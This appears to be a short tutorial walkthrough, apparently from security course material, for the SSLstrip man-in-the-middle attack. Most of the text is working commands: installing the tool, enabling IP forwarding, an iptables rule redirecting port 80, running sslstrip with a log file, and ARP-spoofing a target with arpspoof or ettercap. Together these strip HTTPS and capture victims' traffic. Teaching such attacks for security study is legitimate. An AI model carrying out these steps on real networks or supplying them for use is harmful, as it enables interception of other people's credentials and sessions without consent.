SSLstrip will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial.

Install requirements:

# aptitude install python
# aptitude install python-twisted-web

Download the tool:

sslstrip-0.7.tar.gz

Install:

$ tar xzvf sslstrip-0.7.tar.gz
$ cd sslstrip-0.7
$ sudo python setup.py install 

Flip your machine into forwarding mode (as root):

# echo "1" > /proc/sys/net/ipv4/ip_forward

Setup iptables to intercept HTTP requests (as root):

# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port yourListenPort
# iptables -t nat -L
	
Chain PREROUTING (policy ACCEPT)
target     prot opt source               destination         
REDIRECT   tcp  --  anywhere             anywhere            tcp dpt:www redir ports yourListenPort

Run sslstrip:

# sslstrip.py -l listenPort -w logfile

Run ARP spoofing tool to redirect traffic to your machine (as root):

Two ways to ARP spoofing

1. arpspoof tool

# arpspoof -i yourNetworkDevice -t yourTarget theGatewayIpAddress

2. ettercap tool

# ettercap -TqM ARP:REMOTE /theGateway/ /yourTarget/

http://samsclass.info
Detailed info here.